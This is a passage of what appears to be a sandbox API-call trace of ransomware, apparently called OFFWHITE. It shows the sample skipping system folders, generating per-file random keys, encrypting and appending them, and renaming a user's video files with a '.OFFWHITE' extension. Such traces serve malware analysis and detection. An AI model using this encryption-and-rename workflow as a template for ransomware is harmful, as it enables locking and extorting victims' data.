lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xf4d8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0xf4d8, lpOverlapped=0x0) returned 1 [0136.053] GetProcessHeap () returned 0x500000 [0136.053] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.053] CloseHandle (hObject=0x21c) returned 1 [0136.054] GetProcessHeap () returned 0x500000 [0136.054] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.055] GetProcessHeap () returned 0x500000 [0136.055] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.055] GetProcessHeap () returned 0x500000 [0136.055] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.055] GetProcessHeap () returned 0x500000 [0136.055] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.055] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\BokOXLpFeKotVq.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\BokOXLpFeKotVq.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\BokOXLpFeKotVq.swf" [0136.055] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\BokOXLpFeKotVq.swf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\BokOXLpFeKotVq.swf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\BokOXLpFeKotVq.swf.OFFWHITE" [0136.055] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\BokOXLpFeKotVq.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\bokoxlpfekotvq.swf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\BokOXLpFeKotVq.swf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\bokoxlpfekotvq.swf.offwhite")) returned 1 [0136.056] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e2bb80, ftCreationTime.dwHighDateTime=0x1d5dcc7, ftLastAccessTime.dwLowDateTime=0xb84a0870, ftLastAccessTime.dwHighDateTime=0x1d5dc58, ftLastWriteTime.dwLowDateTime=0xb84a0870, ftLastWriteTime.dwHighDateTime=0x1d5dc58, nFileSizeHigh=0x0, nFileSizeLow=0xb3e2, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="eISQCTxkPNmfB.avi", cAlternateFileName="EISQCT~1.AVI")) returned 1 [0136.057] lstrcmpiW (lpString1="eISQCTxkPNmfB.avi", lpString2=".") returned 1 [0136.057] lstrcmpiW (lpString1="eISQCTxkPNmfB.avi", lpString2="..") returned 1 [0136.057] lstrcmpiW (lpString1="eISQCTxkPNmfB.avi", lpString2="...") returned 1 [0136.057] lstrcmpiW (lpString1="eISQCTxkPNmfB.avi", lpString2="windows") returned -1 [0136.057] lstrcmpiW (lpString1="eISQCTxkPNmfB.avi", lpString2="$recycle.bin") returned 1 [0136.057] lstrcmpiW (lpString1="eISQCTxkPNmfB.avi", lpString2="rsa") returned -1 [0136.057] lstrcmpiW (lpString1="eISQCTxkPNmfB.avi", lpString2="ntuser.dat") returned -1 [0136.057] lstrcmpiW (lpString1="eISQCTxkPNmfB.avi", lpString2="programdata") returned -1 [0136.057] lstrcmpiW (lpString1="eISQCTxkPNmfB.avi", lpString2="appdata") returned 1 [0136.057] lstrcmpiW (lpString1="eISQCTxkPNmfB.avi", lpString2="program files") returned -1 [0136.057] lstrcmpiW (lpString1="eISQCTxkPNmfB.avi", lpString2="program files (x86)") returned -1 [0136.057] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.057] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="eISQCTxkPNmfB.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\eISQCTxkPNmfB.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\eISQCTxkPNmfB.avi" [0136.057] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.057] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.057] PathFindExtensionW (pszPath="eISQCTxkPNmfB.avi") returned=".avi" [0136.057] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0136.057] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0136.057] lstrcmpiW (lpString1=".avi", lpString2=".cab") returned -1 [0136.057] lstrcmpiW (lpString1=".avi", lpString2=".cmd") returned -1 [0136.057] lstrcmpiW (lpString1=".avi", lpString2=".com") returned -1 [0136.057] lstrcmpiW (lpString1=".avi", lpString2=".cpl") returned -1 [0136.057] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0136.057] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0136.057] lstrcmpiW (lpString1=".avi", lpString2=".url") returned -1 [0136.058] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0136.058] lstrcmpiW (lpString1=".avi", lpString2=".mp3") returned -1 [0136.058] lstrcmpiW (lpString1=".avi", lpString2=".pif") returned -1 [0136.058] lstrcmpiW (lpString1=".avi", lpString2=".mp4") returned -1 [0136.058] lstrcmpiW (lpString1=".avi", lpString2=".OFFWHITE") returned -1 [0136.058] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0136.058] lstrcmpiW (lpString1="eISQCTxkPNmfB.avi", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0136.058] GetProcessHeap () returned 0x500000 [0136.058] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522040 [0136.058] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\eISQCTxkPNmfB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\eisqctxkpnmfb.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.058] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=46050) returned 1 [0136.058] GetProcessHeap () returned 0x500000 [0136.058] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.058] GetProcessHeap () returned 0x500000 [0136.058] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.058] GetProcessHeap () returned 0x500000 [0136.058] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.058] GetProcessHeap () returned 0x500000 [0136.059] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.059] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.059] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.059] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.059] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.059] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.059] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.059] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.059] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.059] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.059] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.059] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.059] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.060] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb3e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.060] SetLastError (dwErrCode=0x0) [0136.060] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.062] GetLastError () returned 0x0 [0136.062] GetLastError () returned 0x0 [0136.062] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb4e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.062] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.062] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb5e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.062] WriteFile (in: hFile=0x21c, lpBuffer=0x522040*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522040*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.062] GetProcessHeap () returned 0x500000 [0136.062] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xb3e2) returned 0x55a7b8 [0136.062] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.062] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xb3e2, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0xb3e2, lpOverlapped=0x0) returned 1 [0136.066] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.066] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xb3e2, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0xb3e2, lpOverlapped=0x0) returned 1 [0136.066] GetProcessHeap () returned 0x500000 [0136.066] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.066] CloseHandle (hObject=0x21c) returned 1 [0136.068] GetProcessHeap () returned 0x500000 [0136.068] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.068] GetProcessHeap () returned 0x500000 [0136.068] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.068] GetProcessHeap () returned 0x500000 [0136.068] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.068] GetProcessHeap () returned 0x500000 [0136.068] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.068] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\eISQCTxkPNmfB.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\eISQCTxkPNmfB.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\eISQCTxkPNmfB.avi" [0136.068] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\eISQCTxkPNmfB.avi", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\eISQCTxkPNmfB.avi.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\eISQCTxkPNmfB.avi.OFFWHITE" [0136.068] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\eISQCTxkPNmfB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\eisqctxkpnmfb.avi"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\eISQCTxkPNmfB.avi.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\eisqctxkpnmfb.avi.offwhite")) returned 1 [0136.069] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x963af4f0, ftCreationTime.dwHighDateTime=0x1d5df33, ftLastAccessTime.dwLowDateTime=0x208f20f0, ftLastAccessTime.dwHighDateTime=0x1d5d7ae, ftLastWriteTime.dwLowDateTime=0x208f20f0, ftLastWriteTime.dwHighDateTime=0x1d5d7ae, nFileSizeHigh=0x0, nFileSizeLow=0x11555, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="gPRJ-R9KcacetI.mp4", cAlternateFileName="GPRJ-R~1.MP4")) returned 1 [0136.069] lstrcmpiW (lpString1="gPRJ-R9KcacetI.mp4", lpString2=".") returned 1 [0136.069] lstrcmpiW (lpString1="gPRJ-R9KcacetI.mp4", lpString2="..") returned 1 [0136.069] lstrcmpiW (lpString1="gPRJ-R9KcacetI.mp4", lpString2="...") returned 1 [0136.069] lstrcmpiW (lpString1="gPRJ-R9KcacetI.mp4", lpString2="windows") returned -1 [0136.069] lstrcmpiW (lpString1="gPRJ-R9KcacetI.mp4", lpString2="$recycle.bin") returned 1 [0136.069] lstrcmpiW (lpString1="gPRJ-R9KcacetI.mp4", lpString2="rsa") returned -1 [0136.069] lstrcmpiW (lpString1="gPRJ-R9KcacetI.mp4", lpString2="ntuser.dat") returned -1 [0136.069] lstrcmpiW (lpString1="gPRJ-R9KcacetI.mp4", lpString2="programdata") returned -1 [0136.069] lstrcmpiW (lpString1="gPRJ-R9KcacetI.mp4", lpString2="appdata") returned 1 [0136.069] lstrcmpiW (lpString1="gPRJ-R9KcacetI.mp4", lpString2="program files") returned -1 [0136.069] lstrcmpiW (lpString1="gPRJ-R9KcacetI.mp4", lpString2="program files (x86)") returned -1 [0136.069] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.069] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="gPRJ-R9KcacetI.mp4" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\gPRJ-R9KcacetI.mp4") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\gPRJ-R9KcacetI.mp4" [0136.069] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.069] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.069] PathFindExtensionW (pszPath="gPRJ-R9KcacetI.mp4") returned=".mp4" [0136.069] lstrcmpiW (lpString1=".mp4", lpString2=".exe") returned 1 [0136.069] lstrcmpiW (lpString1=".mp4", lpString2=".log") returned 1 [0136.070] lstrcmpiW (lpString1=".mp4", lpString2=".cab") returned 1 [0136.070] lstrcmpiW (lpString1=".mp4", lpString2=".cmd") returned 1 [0136.070] lstrcmpiW (lpString1=".mp4", lpString2=".com") returned 1 [0136.070] lstrcmpiW (lpString1=".mp4", lpString2=".cpl") returned 1 [0136.070] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0136.070] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0136.070] lstrcmpiW (lpString1=".mp4", lpString2=".url") returned -1 [0136.070] lstrcmpiW (lpString1=".mp4", lpString2=".ttf") returned -1 [0136.070] lstrcmpiW (lpString1=".mp4", lpString2=".mp3") returned 1 [0136.070] lstrcmpiW (lpString1=".mp4", lpString2=".pif") returned -1 [0136.070] lstrcmpiW (lpString1=".mp4", lpString2=".mp4") returned 0 [0136.070] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0636590, ftCreationTime.dwHighDateTime=0x1d5e2c2, ftLastAccessTime.dwLowDateTime=0x7fc1ae30, ftLastAccessTime.dwHighDateTime=0x1d5dc0e, ftLastWriteTime.dwLowDateTime=0x7fc1ae30, ftLastWriteTime.dwHighDateTime=0x1d5dc0e, nFileSizeHigh=0x0, nFileSizeLow=0x43b0, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="iK_2PblzI LnIeD7gD.flv", cAlternateFileName="IK_2PB~1.FLV")) returned 1 [0136.070] lstrcmpiW (lpString1="iK_2PblzI LnIeD7gD.flv", lpString2=".") returned 1 [0136.070] lstrcmpiW (lpString1="iK_2PblzI LnIeD7gD.flv", lpString2="..") returned 1 [0136.070] lstrcmpiW (lpString1="iK_2PblzI LnIeD7gD.flv", lpString2="...") returned 1 [0136.070] lstrcmpiW (lpString1="iK_2PblzI LnIeD7gD.flv", lpString2="windows") returned -1 [0136.070] lstrcmpiW (lpString1="iK_2PblzI LnIeD7gD.flv", lpString2="$recycle.bin") returned 1 [0136.070] lstrcmpiW (lpString1="iK_2PblzI LnIeD7gD.flv", lpString2="rsa") returned -1 [0136.070] lstrcmpiW (lpString1="iK_2PblzI LnIeD7gD.flv", lpString2="ntuser.dat") returned -1 [0136.070] lstrcmpiW (lpString1="iK_2PblzI LnIeD7gD.flv", lpString2="programdata") returned -1 [0136.070] lstrcmpiW (lpString1="iK_2PblzI LnIeD7gD.flv", lpString2="appdata") returned 1 [0136.070] lstrcmpiW (lpString1="iK_2PblzI LnIeD7gD.flv", lpString2="program files") returned -1 [0136.070] lstrcmpiW (lpString1="iK_2PblzI LnIeD7gD.flv", lpString2="program files (x86)") returned -1 [0136.070] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.070] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="iK_2PblzI LnIeD7gD.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\iK_2PblzI LnIeD7gD.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\iK_2PblzI LnIeD7gD.flv" [0136.070] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.070] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.071] PathFindExtensionW (pszPath="iK_2PblzI LnIeD7gD.flv") returned=".flv" [0136.071] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0136.071] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0136.071] lstrcmpiW (lpString1=".flv", lpString2=".cab") returned 1 [0136.071] lstrcmpiW (lpString1=".flv", lpString2=".cmd") returned 1 [0136.071] lstrcmpiW (lpString1=".flv", lpString2=".com") returned 1 [0136.071] lstrcmpiW (lpString1=".flv", lpString2=".cpl") returned 1 [0136.071] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0136.072] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0136.072] lstrcmpiW (lpString1=".flv", lpString2=".url") returned -1 [0136.072] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0136.072] lstrcmpiW (lpString1=".flv", lpString2=".mp3") returned -1 [0136.072] lstrcmpiW (lpString1=".flv", lpString2=".pif") returned -1 [0136.072] lstrcmpiW (lpString1=".flv", lpString2=".mp4") returned -1 [0136.072] lstrcmpiW (lpString1=".flv", lpString2=".OFFWHITE") returned -1 [0136.072] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0136.072] lstrcmpiW (lpString1="iK_2PblzI LnIeD7gD.flv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0136.072] GetProcessHeap () returned 0x500000 [0136.072] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522050 [0136.072] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\iK_2PblzI LnIeD7gD.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\ik_2pblzi lnied7gd.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.072] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=17328) returned 1 [0136.072] GetProcessHeap () returned 0x500000 [0136.072] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.072] GetProcessHeap () returned 0x500000 [0136.072] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.072] GetProcessHeap () returned 0x500000 [0136.073] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.073] GetProcessHeap () returned 0x500000 [0136.073] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.073] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.073] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.073] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.073] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.073] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.073] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.073] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.073] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.073] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.073] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.073] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.073] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.074] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x43b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.074] SetLastError (dwErrCode=0x0) [0136.074] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.076] GetLastError () returned 0x0 [0136.076] GetLastError () returned 0x0 [0136.076] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x44b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.076] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.076] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x45b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.076] WriteFile (in: hFile=0x21c, lpBuffer=0x522050*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522050*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.076] GetProcessHeap () returned 0x500000 [0136.076] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x43b0) returned 0x55a7b8 [0136.076] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.076] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x43b0, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x43b0, lpOverlapped=0x0) returned 1 [0136.078] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.078] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x43b0, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x43b0, lpOverlapped=0x0) returned 1 [0136.078] GetProcessHeap () returned 0x500000 [0136.078] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.078] CloseHandle (hObject=0x21c) returned 1 [0136.082] GetProcessHeap () returned 0x500000 [0136.083] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.083] GetProcessHeap () returned 0x500000 [0136.083] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.083] GetProcessHeap () returned 0x500000 [0136.083] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.083] GetProcessHeap () returned 0x500000 [0136.083] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.083] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\iK_2PblzI LnIeD7gD.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS 